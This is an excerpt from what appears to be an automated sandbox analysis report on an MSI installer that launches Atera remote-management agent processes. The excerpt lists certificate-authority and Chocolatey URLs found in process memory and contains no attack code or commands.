                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, System.Threading.Tasks.dll.26.dr, Pubnub.dll0.1.dr, Atera.AgentPackages.CommonLib.dll2.26.dr, Microsoft.Extensions.Configuration.Abstractions.dll0.26.dr, System.Dynamic.Runtime.dll.26.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00252000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4Cod
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A76000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DEE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42F44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B22000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.000002163092E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1752871469.000001779DC7F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1762481931.00000177B82C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B903000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B928000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B420000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2389101650.0000021C5B8B0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B0BB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630946000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2901951908.0000021649213000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630D43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E1E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2898620667.00000216491D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2904274317.0000021649239000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001C7000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00241000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D5000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B903000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B090000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1985317540.000002156C3F5000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1985299370.0000015E7E13A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E51000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2904274317.0000021649239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B43E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt9z
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.rawgit.com/chocolatey/chocolatey-coreteampackages/50fd97744110dcbce1acde889c0870599c9d558
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807F3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538094B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807F3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153801EC000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380773000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380235000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538023D000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380501000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153804F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538094B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380773000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/8
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807F3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380773000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/Packages(Id=
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807F3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153801E4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153801E8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380773000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538023D000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807E6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/Search?searchTerm=
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                                Source: AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
                                Source: powershell.exe, 0000001F.00000002.2147974616.0000022F64ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoFR
                                Source: rundll32.exe, 00000004.00000002.1704657212.00000000075F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsu
                                Source: AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2901951908.0000021649223000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, System.Threading.Tasks.dll.26.dr, Pubnub.dll0.1.dr, Atera.AgentPackages.CommonLib.dll2.26.dr, Microsoft.Extensions.Configuration.Abstractions.dll0.26.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8022000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FF2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl)
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1752871469.000001779DC7F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1762481931.00000177B82C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A76000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B903000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B928000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B420000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2389101650.0000021C5B8B0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DEE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42F44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B0BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl6
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E1E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2898620667.00000216491D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 